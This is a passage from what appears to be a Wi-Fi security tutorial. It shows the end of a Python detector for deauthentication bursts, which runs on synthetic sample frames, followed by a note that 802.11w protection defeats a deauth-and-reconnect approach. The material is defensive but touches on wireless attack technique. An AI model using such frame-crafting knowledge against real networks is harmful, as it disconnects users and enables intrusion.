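        frames.append((t + i * 0.4 + 0.1, build_mgmt_frame(BEACON, BROADCAST, AP_ATTACKED, AP_ATTACKED)))
    frames.append((t + 5.0, build_mgmt_frame(DEAUTH, CLIENT, AP_QUIET, AP_QUIET, reason=3)))
    frames.append((t + 6.0, build_mgmt_frame(BEACON, BROADCAST, AP_QUIET, AP_QUIET)))
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    for a in detect_deauth_bursts(sample_frames()):
        print(f"{a['bssid']}: {a['count']} deauth/disassoc frames in "
              f"{a['end'] - a['start']:.1f}s, broadcast={a['broadcast']}, "
              f"reasons={sorted(a['reasons'])}")
```

To run it on real traffic, feed it frames from a monitor-mode capture with the radiotap header stripped. Networks that enforce 802.11w Protected Management Frames discard unauthenticated deauthentication frames, which is why this deauth-and-reconnect approach does not work against them.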